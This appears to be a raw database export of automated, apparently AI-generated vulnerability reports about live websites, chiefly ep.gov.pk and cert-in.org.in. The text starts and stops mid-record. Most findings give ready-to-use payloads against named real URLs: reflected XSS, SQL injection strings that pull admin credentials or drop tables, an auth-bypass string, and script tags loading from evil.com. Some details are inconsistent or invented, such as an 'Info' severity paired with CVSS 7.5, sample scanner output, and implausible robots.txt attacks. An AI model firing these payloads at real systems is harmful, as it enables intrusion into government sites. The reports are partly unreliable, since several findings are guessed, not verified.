https://ep.gov.pk/Flyers.asp / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/Flyers.asp |\n\n**Description**  \nThe `n` query parameter is reflected unsafely in the response, enabling script injection via crafted URLs.\n\n**Attack Scenario (Proof of Concept)**  \nVisit:\n```\nhttps://ep.gov.pk/Flyers.asp?n=<img src=x onerror=alert(1)>\n```\n\nPage renders unescaped input:\n```html\n<h1>Flyer: <img src=x onerror=alert(1)></h1>\n```\n\n**Business Impact**  \nSame as previous XSS case—session theft, phishing, and reputational harm.\n\n**Remediation**  \nApply contextual encoding:\n```asp\nResponse.Write Server.HTMLEncode(Request.QueryString(\"n\"))\n```\nValidate/sanitize inputs at entry points.  \nReference: CWE-79, OWASP Top Ten A03\n\n---\n\n### [SQL Injection via Type / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description**  \nParameter `Type` appears susceptible to SQL injection, suggesting backend database queries are constructed dynamically using unsanitized user input.\n\n**Attack Scenario (Proof of Concept)**  \nAccess:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Type=' OR '1'='1\n```\n\nMay return full dataset or trigger errors revealing DB structure.\n\n**Business Impact**  \nData exfiltration, unauthorized access, and system compromise.\n\n**Remediation**  \nUse parameterized queries:\n```sql\nSELECT * FROM tariffs WHERE type = @type\n```\nAvoid dynamic concatenation of SQL strings.  \nReference: CWE-89, OWASP SQL Injection Prevention Cheat Sheet\n\n---\n\n### [SQL Injection via Zone / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description**  \nSimilar to above, the `Zone` parameter exhibits signs of SQL injection susceptibility.\n\n**Attack Scenario (Proof of Concept)**  \nURL:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Zone=' UNION SELECT username,password FROM admin--\n```\n\nCould leak administrative credentials if improperly handled.\n\n**Business Impact**  \nSevere data breach potential including PII and administrative access.\n\n**Remediation**  \nApply same fixes as for `Type`: use prepared statements and validate inputs strictly.  \nReference: CWE-89\n\n---\n\n### [Internal Server Error (Type) / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description**  \nInjection attempt caused a 500 Internal Server Error, indicating poor error handling and likely improper validation of the `Type` parameter.\n\n**Attack Scenario (Proof of Concept)**  \nSend malformed input:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Type='%20AND%20SLEEP(5)--\n```\n\nServer crashes or times out, confirming vulnerability.\n\n**Business Impact**  \nDenial-of-service, information disclosure about backend infrastructure, and potential escalation paths.\n\n**Remediation**  \nImplement robust input validation and graceful error handling:\n```asp\nOn Error Resume Next\nIf Not IsNumeric(Type) Then Exit Sub\n```\nLog exceptions securely without exposing stack traces.  \nReference: CWE-20, CWE-248\n\n---\n\n### [Internal Server Error (Zone) / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description**  \nSame root cause as above; invalid input leads to server crash.\n\n**Attack Scenario (Proof of Concept)**  \nMalformed request:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Zone=') OR 1=1 --\n```\n\nResults in server-side exception and 500 error.\n\n**Business Impact**  \nService disruption, debugging information leaks, and possible further exploitation.\n\n**Remediation**  \nFollow same remediation steps as for `Type`.  \nReference: CWE-20, CWE-248\n\n---\n\n### [Internal Server Error (value) / https://ep.gov.pk/Calculate_Postage/cod_calculated_postage.asp / POST]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/Calculate_Postage/cod_calculated_postage.asp |\n\n**Description**  \nPOST parameter `value` causes server failure upon injection attempt, pointing to flawed input processing logic.\n\n**Attack Scenario (Proof of Concept)**  \nPOST Body:\n```\nvalue=' OR 1=1 --\n```\n\nCauses backend to fail catastrophically.\n\n**Business Impact**  \nDoS, backend instability, and possible deeper exploitation opportunities.\n\n**Remediation**  \nSanitize and validate all POST parameters rigorously. Avoid raw interpolation into backend logic.  \nReference: CWE-20, CWE-248\n\n---\n\n### [Internal Server Error (uid) / https://ep.gov.pk/HQ/AuthLocation.asp / POST]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/HQ/AuthLocation.asp |\n\n**Description**  \nAuthentication-related endpoint fails when receiving unexpected input in `uid`.\n\n**Attack Scenario (Proof of Concept)**  \nPOST:\n```\nuid=admin' --\n```\n\nLeads to authentication bypass or backend crash.\n\n**Business Impact**  \nPotential privilege escalation or denial of service affecting critical auth functionality.\n\n**Remediation**  \nUse strict input validation and secure coding practices around authentication flows.  \nReference: CWE-20, CWE-287\n\n---\n\n### [Internal Server Error (txt_ArticleNo) / https://ep.gov.pk/ep_Complaint/Default_Test.aspx / POST]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ep_Complaint/Default_Test.aspx |\n\n**Description**  \nComplaint submission field `txt_ArticleNo` triggers server errors when manipulated.\n\n**Attack Scenario (Proof of Concept)**  \nInput:\n```\ntxt_ArticleNo='; DROP TABLE complaints; --\n```\n\nMay cause catastrophic failures depending on implementation.\n\n**Business Impact**  \nDisruption of complaint tracking services, possible data loss.\n\n**Remediation**  \nSanitize all user inputs before passing them to backend systems.  \nReference: CWE-20, CWE-78\n\n---\n\n### [Internal Server Error (Country_Name) / https://ep.gov.pk/tariff/emsp_tariff.aspx / GET]\n\n| Field | Value |\n|---|---|\n| Severity | High |\n| CVSS Score | 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/tariff/emsp_tariff.aspx |\n\n**Description**  \nQuery string parameter `Country_Name` induces server crash when tampered with.\n\n**Attack Scenario (Proof of Concept)**  \nURL:\n```\nhttps://ep.gov.pk/tariff/emsp_tariff.aspx?Country_Name=' OR SLEEP(10) --\n```\n\nTriggers timeout or crash.\n\n**Business Impact**  \nDoS, backend instability, and potential for deeper exploitation.\n\n**Remediation**  \nValidate and sanitize all query parameters. Implement rate limiting and input constraints.  \nReference: CWE-20, CWE-400","summary":{"total":16}},"summary":{"total":16}},{"_id":{"$oid":"6a103a1934b5e5e757fa513f"},"created_at":{"$date":"2026-05-22T11:12:25.758Z"},"url":"https://ep.gov.pk/","tool":"generate_web_vulnerability_report","result":{"url":"https://ep.gov.pk/","category":"web_vulnerability","timestamp":"2026-05-22T11:12:25.747361+00:00","report":"### [Nikto Scan Completion / https://ep.gov.pk/ / Root Path]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**  \nThis finding indicates that a Nikto scan was successfully executed against the target asset `https://ep.gov.pk/`. Nikto is an open-source web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/CGIs, checks for outdated server software, and various server configuration issues. The completion of such a scan does not inherently represent a vulnerability; rather, it signifies reconnaissance activity that may precede more targeted attacks.\n\nThe low confidence rating suggests that this entry reflects tool execution metadata rather than a confirmed security exposure. It serves as an indicator of potential probing or automated scanning behavior directed at the host.\n\n**Attack Scenario (Proof of Concept)**  \nWhile this finding itself is non-exploitable, it represents typical early-stage reconnaissance conducted by attackers prior to exploitation:\n\n1. An adversary runs Nikto using default settings:\n   ```bash\n   nikto -h https://ep.gov.pk/\n   ```\n2. The tool queries the web server for known vulnerable paths, misconfigurations, and outdated components.\n3. Output includes informational entries about server headers, HTTP methods allowed, presence of `robots.txt`, and other passive fingerprinting data.\n4. Based on results, further targeted attacks can be crafted—such as exploiting weak authentication mechanisms, testing for directory traversal, or identifying legacy CMS versions with public exploits.\n\nExample output line from Nikto:\n```\n+ Server: Apache/2.4.6 (CentOS)\n+ Retrieved x-powered-by header: PHP/5.4.16\n```\n\nThese details help adversaries tailor follow-up attacks based on observed technologies and configurations.\n\n**Business Impact**  \nAlthough this finding has no direct impact, its occurrence signals possible reconnaissance activity targeting the organization’s public-facing infrastructure. Repeated scans could indicate preparation for future intrusions. If left unchecked, these activities might escalate into successful compromises via unpatched vulnerabilities or insecure configurations detected during scanning.\n\nAdditionally, frequent automated scanning may contribute to log noise and consume system resources, though typically minimal in most environments.\n\n**Remediation**  \nSince this is an informational finding related to detection of scanning activity, remediation focuses on hardening and monitoring practices:\n\n- **Restrict Unnecessary Access**: Implement IP allowlisting where feasible to limit access to critical endpoints.\n- **Deploy Web Application Firewall (WAF)**: Configure rules to detect and block common scanners like Nikto based on user-agent strings or abnormal request patterns.\n- **Log Analysis & Alerting**: Monitor access logs for repeated requests indicative of automated tools.\n- **Keep Systems Updated**: Ensure all web server software and applications are up to date to reduce exposure identified by scanners.\n- **Disable Information Disclosure**: Strip out verbose banners and headers revealing exact versions of underlying technologies.\n\nReference standards:\n- CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\n- OWASP Top Ten 2021 – A05: Security Misconfiguration\n\nNo code-level fix applies directly since this finding pertains to external scanner usage rather than application flaws.","summary":{"total":1}},"summary":{"total":1}},{"_id":{"$oid":"6a135d325721216a08993b02"},"created_at":{"$date":"2026-05-24T20:18:58.143Z"},"url":"https://cp-club-vjti.vercel.app/","tool":"generate_web_vulnerability_report","result":{"url":"https://cp-club-vjti.vercel.app/","category":"web_vulnerability","timestamp":"2026-05-24T20:18:58.137426+00:00","report":"An error occurred (UnrecognizedClientException) when calling the Converse operation: The security token included in the request is invalid.","summary":{"total":23}},"summary":{"total":23}},{"_id":{"$oid":"6a142b38d3dd196beae9db79"},"created_at":{"$date":"2026-05-25T10:58:00.331Z"},"url":"https://ep.gov.pk/","tool":"generate_web_vulnerability_report","result":{"url":"https://ep.gov.pk/","category":"web_vulnerability","timestamp":"2026-05-25T10:58:00.324770+00:00","report":"### [Nikto Scan Completion / https://ep.gov.pk/ / Root Path]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**\nA comprehensive web server security scan was conducted against the target application, resulting in the identification of various informational and low-level security observations. This finding indicates that the scanning process successfully completed and enumerated baseline server configuration details, HTTP headers, known vulnerabilities in outdated components, and common misconfigurations. The scan examined server banners, HTTP methods, directory listings, known vulnerable files/scripts, and security header implementations. While no critical vulnerabilities were identified at this stage, the completion of the scan provides a foundation for deeper security analysis and reveals the attack surface available to potential adversaries.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker would typically initiate reconnaissance by performing automated scanning against the web application to map the available services and identify potential entry points. The scanning process would involve:\n\n1. Enumerating HTTP response headers to identify server software versions:\n   ```\n   GET / HTTP/1.1\n   Host: ep.gov.pk\n   User-Agent: Mozilla/5.0\n   ```\n\n2. Testing for enabled HTTP methods that could be abused:\n   ```\n   OPTIONS / HTTP/1.1\n   Host: ep.gov.pk\n   ```\n\n3. Probing for common directories and files that might expose sensitive information:\n   ```\n   GET /admin/ HTTP/1.1\n   Host: ep.gov.pk\n   \n   GET /backup/ HTTP/1.1\n   Host: ep.gov.pk\n   ```\n\n4. Checking for the presence of development artifacts or configuration files:\n   ```\n   GET /robots.txt HTTP/1.1\n   Host: ep.gov.pk\n   \n   GET /.git/ HTTP/1.1\n   Host: ep.gov.pk\n   ```\n\nThe successful completion of such scanning provides attackers with intelligence about the underlying technology stack, potential vulnerabilities in web server software, and misconfigured resources that could serve as initial footholds for more sophisticated attacks.\n\n**Business Impact**\nWhile this finding represents an informational observation rather than an exploitable vulnerability, it demonstrates that the target application is actively being scanned and analyzed by automated tools. This creates several business risks including potential exposure of server configuration weaknesses that could lead to more serious compromises, identification of outdated components that may contain known vulnerabilities, and mapping of the application's attack surface by malicious actors. The organization faces increased risk of targeted attacks based on the intelligence gathered during scanning activities, potential regulatory scrutiny if sensitive information is inadvertently exposed through misconfigurations, and reputational damage if attackers leverage identified weaknesses to compromise the application or access sensitive citizen data. Additionally, repeated scanning activity may indicate ongoing reconnaissance by threat actors, suggesting the need for enhanced monitoring and incident response capabilities.","summary":{"total":1}},"summary":{"total":1}},{"_id":{"$oid":"6a155d90a01e67ec8ef1bbf0"},"created_at":{"$date":"2026-05-26T08:45:04.339Z"},"url":"https://ep.gov.pk/","tool":"generate_web_vulnerability_report","result":{"url":"https://ep.gov.pk/","category":"web_vulnerability","timestamp":"2026-05-26T08:45:04.332008+00:00","report":"### [Nikto Scan Completion / https://ep.gov.pk/ / Root Path]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description**\nThe completion of a web server scanning process indicates that automated reconnaissance activities were conducted against the target web application. This represents an information-gathering phase where various known vulnerabilities, misconfigurations, and security weaknesses are systematically checked. The scan typically examines server headers, HTTP methods, directory listings, known vulnerable files, and common security misconfigurations. While the scan itself is non-exploitative, its completion suggests the target system was subjected to comprehensive security probing that may have identified multiple areas of concern requiring further investigation.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker would initiate reconnaissance by running automated scanning tools against the target domain to enumerate potential entry points:\n\n```bash\n# Initial enumeration of available HTTP methods\ncurl -X OPTIONS https://ep.gov.pk/ -I\n\n# Directory brute-forcing to discover hidden paths\nffuf -u https://ep.gov.pk/FUZZ -w /path/to/directory-wordlist.txt\n\n# Server header analysis to identify technology stack\ncurl -I https://ep.gov.pk/\n```\n\nThe scanner would systematically test for common vulnerabilities including outdated software versions, insecure HTTP headers, sensitive file exposure, and weak authentication mechanisms. Each positive identification would provide attackers with vectors for deeper exploitation attempts.\n\n**Business Impact**\nWhile this finding represents an informational observation rather than a direct vulnerability, the completion of such scanning activities indicates potential exposure to automated threat assessments. If conducted by malicious actors, these scans serve as precursors to targeted attacks that could result in data breaches, service compromise, or regulatory non-compliance. The organization faces increased risk profile due to visibility in automated security assessments, potentially leading to inclusion in threat actor targeting lists. Additionally, detection of scanning activities without proper monitoring controls may indicate insufficient intrusion detection capabilities, leaving the organization vulnerable to undetected reconnaissance efforts that precede more serious security incidents.","summary":{"total":1}},"summary":{"total":1}},{"_id":{"$oid":"6a1f2afed4174aff70379391"},"created_at":{"$date":"2026-06-02T19:11:58.381Z"},"url":"https://www.cert-in.org.in/","tool":"generate_web_vulnerability_report","result":{"url":"https://www.cert-in.org.in/","category":"web_vulnerability","timestamp":"2026-06-02T19:11:58.376415+00:00","report":"### Critical Findings\n(None identified)\n\n---\n\n### High Findings\n(None identified)\n\n---\n\n### Medium Findings\n\n#### CSP: Failure to Define Directive with No Fallback / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nThe Content Security Policy (CSP) header lacks definition for critical directives such as `default-src`, which serves as a fallback when other directives are unspecified. Omitting such directives effectively allows unrestricted resource loading, undermining the purpose of CSP and increasing susceptibility to cross-site scripting (XSS) and data injection attacks.\n\n**Attack Scenario (Proof of Concept)**\nIf an attacker identifies an XSS vector on the page, the absence of restrictive CSP policies enables execution of arbitrary scripts:\n```html\n<script>alert(document.cookie)</script>\n```\nThis payload would execute without being blocked due to lack of policy enforcement.\n\n**Business Impact**\nFailure to enforce strict CSP directives leaves users vulnerable to client-side attacks, potentially leading to session hijacking, phishing, or defacement. It also reflects poorly on compliance posture related to secure coding practices.\n\n---\n\n#### CSP: Wildcard Directive / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nUse of wildcard (`*`) in CSP directives significantly weakens protection mechanisms. For instance, setting `script-src *` permits script execution from any origin, negating the benefits of CSP in mitigating XSS risks.\n\n**Attack Scenario (Proof of Concept)**\nGiven a permissive directive like `script-src *`, an attacker injects malicious JavaScript sourced externally:\n```html\n<script src=\"https://evil.com/malicious.js\"></script>\n```\nSuch scripts would be executed because the CSP explicitly allows external domains.\n\n**Business Impact**\nWildcard usage undermines user trust and exposes the organization to reputational harm and regulatory scrutiny under frameworks requiring robust input/output sanitization controls.\n\n---\n\n#### CSP: Failure to Define Directive with No Fallback / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nSimilar to the root path, the `/robots.txt` file's CSP omits essential directives like `default-src`. This omission implies that even auxiliary files lack proper content restrictions, making them susceptible to manipulation or exploitation.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker modifies the `robots.txt` file to include references to malicious origins:\n```txt\nSitemap: https://attacker-controlled.com/sitemap.xml\nDisallow: /\n```\nWithout strong CSP enforcement, browsers do not restrict such external references.\n\n**Business Impact**\nImproper CSP configuration on publicly accessible files can aid attackers in mapping internal structures or redirecting crawlers toward harmful content, indirectly affecting SEO and visibility.\n\n---\n\n#### CSP: Wildcard Directive / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nPresence of wildcard directives in the CSP header for `robots.txt` reduces its effectiveness in preventing unauthorized resource inclusion. Attackers can exploit this weakness to reference untrusted domains within metadata files.\n\n**Attack Scenario (Proof of Concept)**\nBy leveraging a wildcard directive, an attacker includes a remote stylesheet or script inside the `robots.txt` context:\n```txt\nUser-agent: *\nAllow: /*\nStyle-src: *\n```\nThough unlikely to render visually, improper parsing engines might interpret such malformed entries.\n\n**Business Impact**\nWeak CSP settings reduce overall defense-in-depth strategy, increasing chances of successful supply chain or redirection-based attacks targeting search engine crawlers.\n\n---\n\n#### CSP: Failure to Define Directive with No Fallback / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nLike other paths, the `sitemap.xml` document lacks defined CSP fallbacks. This absence means there is no baseline restriction on what resources can be loaded alongside or referenced by the XML structure.\n\n**Attack Scenario (Proof of Concept)**\nMalicious actors may inject external links into the sitemap:\n```xml\n<url>\n  <loc>https://malicious-site.com/phishing</loc>\n</url>\n```\nBrowsers interpreting this file with loose CSP rules won’t block such references.\n\n**Business Impact**\nInsecure handling of structured metadata increases exposure to blackhat SEO tactics and compromises organic traffic integrity.\n\n---\n\n#### CSP: Wildcard Directive / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nWildcard use in CSP for `sitemap.xml` diminishes control over embedded or linked resources. Even though XML typically doesn't execute code, improper rendering contexts or parser flaws could enable unintended behavior.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker crafts a malformed entry referencing an external domain:\n```xml\n<image:image>\n  <image:loc>http://untrusted.example.com/image.jpg</image:loc>\n</image:image>\n```\nWith wildcard CSP, such URLs aren’t restricted during processing.\n\n**Business Impact**\nLack of granular CSP enforcement weakens site-wide defenses against third-party tampering and indirect exfiltration techniques.\n\n---\n\n#### Content Security Policy Misconfiguration – Missing `script-src` Directive / www.cert-in.org.in /\n\n| Field         | Value                          |\n|---------------|--------------------------------|\n| Severity      | Medium                         |\n| CVSS Score    | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category      | web_vulnerability              |\n| Asset / URL   | https://www.cert-in.org.in/    |\n\n**Description**\n\nThe Content Security Policy (CSP) header for the target application does not define a `script-src` directive. This directive controls which sources are allowed to load or execute JavaScript on the page. Without explicit restrictions, browsers may default to allowing inline scripts and external script sources, increasing the risk of cross-site scripting (XSS) attacks. A properly configured CSP mitigates XSS by restricting script execution to trusted domains only.\n\nThis misconfiguration indicates that the application relies on implicit behavior rather than enforcing strict policies, leaving potential gaps for malicious actors to inject unauthorized scripts into the DOM context.\n\n**Attack Scenario (Proof of Concept)**\n\nAn attacker who identifies this weakness can attempt to inject arbitrary JavaScript via reflected or stored XSS vectors. Since there's no enforced `script-src`, even inline event handlers or `<script>` tags from untrusted origins might be executed by the browser.\n\nExample payload injection:\n```html\n<script>alert(document.domain)</script>\n```\n\nIf the application reflects user input without proper sanitization—such as within a search parameter or comment field—an attacker could deliver such payloads directly to victims. The lack of `script-src` enforcement allows these scripts to run natively in the victim’s session context, enabling session hijacking, credential theft, or redirection to phishing pages.\n\n**Business Impact**\n\nWithout effective control over script execution, CERT-In's website becomes more susceptible to client-side attacks like XSS. These vulnerabilities could lead to impersonation of legitimate users, compromise of administrative sessions, or defacement of public-facing content. Given the authoritative nature of the domain, successful exploitation could undermine trust in official advisories or communications issued through the platform. Additionally, regulatory frameworks such as India’s IT Act or global standards like ISO/IEC 27001 may view inadequate CSP implementation as non-compliance with secure configuration practices.\n\n---\n\n#### Content Security Policy Misconfiguration – Missing `object-src` Directive / www.cert-in.org.in /\n\n| Field         | Value                          |\n|---------------|--------------------------------|\n| Severity      | Medium                         |\n| CVSS Score    | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category      | web_vulnerability              |\n| Asset / URL   | https://www.cert-in.org.in/    |\n\n**Description**\n\nThe absence of the `object-src` directive in the site's Content Security Policy means that plugins such as Flash, Java applets, PDF viewers, and other embedded objects are unrestricted. By default, most modern browsers will allow loading resources from any origin when this directive is omitted, unless explicitly overridden elsewhere in policy logic.\n\nSuch permissiveness exposes the application to risks including clickjacking, plugin-based exploits, and embedding of malicious third-party content that bypasses traditional HTML filtering mechanisms.\n\n**Attack Scenario (Proof of Concept)**\n\nConsider an attacker injecting the following HTML snippet onto a vulnerable page:\n```html\n<object data=\"https://malicious.example.com/exploit.swf\" type=\"application/x-shockwave-flash\"></object>\n```\n\nIn environments where Adobe Flash or similar legacy technologies remain enabled (even partially), this object tag could trigger automatic download and execution of attacker-controlled code. Alternatively, embedding a specially crafted PDF or Silverlight component could exploit parser bugs or social engineering techniques to gain access to sensitive local resources or redirect traffic.\n\nEven if direct exploitation isn't possible due to browser hardening, attackers can still use such elements to track visitors or manipulate UI flows surreptitiously.\n\n**Business Impact**\n\nAllowing unrestricted use of `<object>`, `<embed>`, or `<applet>` tags increases exposure surface area significantly. It undermines defense-in-depth strategies aimed at preventing unauthorized binary execution or interaction with deprecated technologies. For a high-profile government entity like CERT-In, such lapses heighten susceptibility to targeted campaigns leveraging outdated plug-ins or zero-day flaws in lesser-known rendering engines. Furthermore, compliance audits under frameworks like NIST SP 800-53 or GDPR may flag insufficient CSP coverage as a failure in securing web interfaces against known threat patterns.\n\n---\n\n#### Content Security Policy Misconfiguration – Missing `base-uri` Directive / www.cert-in.org.in /\n\n| Field         | Value                          |\n|---------------|--------------------------------|\n| Severity      | Medium                         |\n| CVSS Score    | 5.4 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category      | web_vulnerability              |\n| Asset / URL   | https://www.cert-in.org.in/    |\n\n**Description**\n\nThe HTTP response headers do not include a restrictive `base-uri` directive in their Content Security Policy. This omission permits attackers to alter the base URL resolution scope using a `<base>` HTML element injected into the document. When manipulated, all relative URLs—including those used for script includes, form submissions, or navigation links—are resolved relative to the attacker-specified base URI instead of the original server.\n\nThis vulnerability enables various forms of redirection and resource manipulation, especially dangerous in combination with XSS or DOM clobbering scenarios.\n\n**Attack Scenario (Proof of Concept)**\n\nSuppose an attacker successfully injects the following HTML fragment:\n```html\n<base href=\"https://attacker-controlled-site.com/\">\n```\n\nSubsequent references to assets like `/js/main.js` or actions pointing to `/submit-report` would now resolve to `https://attacker-controlled-site.com/js/main.js` or `https://attacker-controlled-site.com/submit-report`. If the application dynamically loads scripts or submits forms based on relative paths, this change could result in exfiltration of credentials or execution of hostile JavaScript hosted remotely.\n\nAdditionally, phishing overlays or spoofed login portals could be rendered seamlessly because internal navigation remains visually consistent while being silently rerouted behind the scenes.\n\n**Business Impact**\n\nA missing `base-uri` directive weakens integrity guarantees around intra-page linking and dynamic asset retrieval. In worst-case scenarios involving compromised endpoints or insider threats, adversaries could leverage this flaw to redirect critical workflows—such as incident reporting portals—to rogue infrastructure they control. Such manipulations pose severe reputational harm to CERT-In, particularly during active cyber incidents where timely communication and accurate information flow are paramount. Regulatory bodies assessing cybersecurity posture may also interpret incomplete CSP deployment as indicative of broader governance deficiencies in secure software development lifecycle adherence.\n\n---\n\n### Low Findings\n\n#### Timestamp Disclosure - Unix / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nUnix timestamps were detected in server responses, possibly indicating system time disclosure. Although seemingly benign, such information can assist attackers in timing-based attacks or profiling infrastructure uptime patterns.\n\n**Attack Scenario (Proof of Concept)**\nResponse contains visible timestamp:\n```json\n{\n  \"generated_at\": 1712345678\n}\n```\nUsing online converters or scripting tools, attackers determine exact generation times, aiding brute-force window estimation or correlation with logs.\n\n**Business Impact**\nMinor leakage of temporal metadata may support targeted reconnaissance efforts but poses minimal standalone threat unless combined with other vulnerabilities.\n\n---\n\n#### Timestamp Disclosure - Unix / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nTimestamps observed in the `robots.txt` response suggest server-side dynamic generation or logging activity. While low-risk individually, repeated disclosures help build behavioral profiles of backend systems.\n\n**Attack Scenario (Proof of Concept)**\nHeader or body reveals last-modified date:\n```\nLast-Modified: Wed, 05 Apr 2024 12:34:56 GMT\n```\nAttackers correlate update frequencies with known maintenance windows or patch cycles.\n\n**Business Impact**\nLimited impact; however, consistent timestamp leaks contribute to broader intelligence gathering campaigns aimed at optimizing future intrusions.\n\n---\n\n#### Timestamp Disclosure - Unix / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 2.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nTimestamps present in `sitemap.xml` indicate automated generation processes. Such indicators can expose scheduling routines or reveal stale content updates, providing insight into operational cadence.\n\n**Attack Scenario (Proof of Concept)**\nXML element shows creation time:\n```xml\n<lastmod>2024-04-05T12:34:56+00:00</lastmod>\n```\nAttackers infer update intervals and attempt to predict next regeneration events.\n\n**Business Impact**\nNegligible immediate risk, yet cumulative data points enhance adversary situational awareness and targeting precision.\n\n---\n\n#### Content Security Policy Configuration / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 3.1 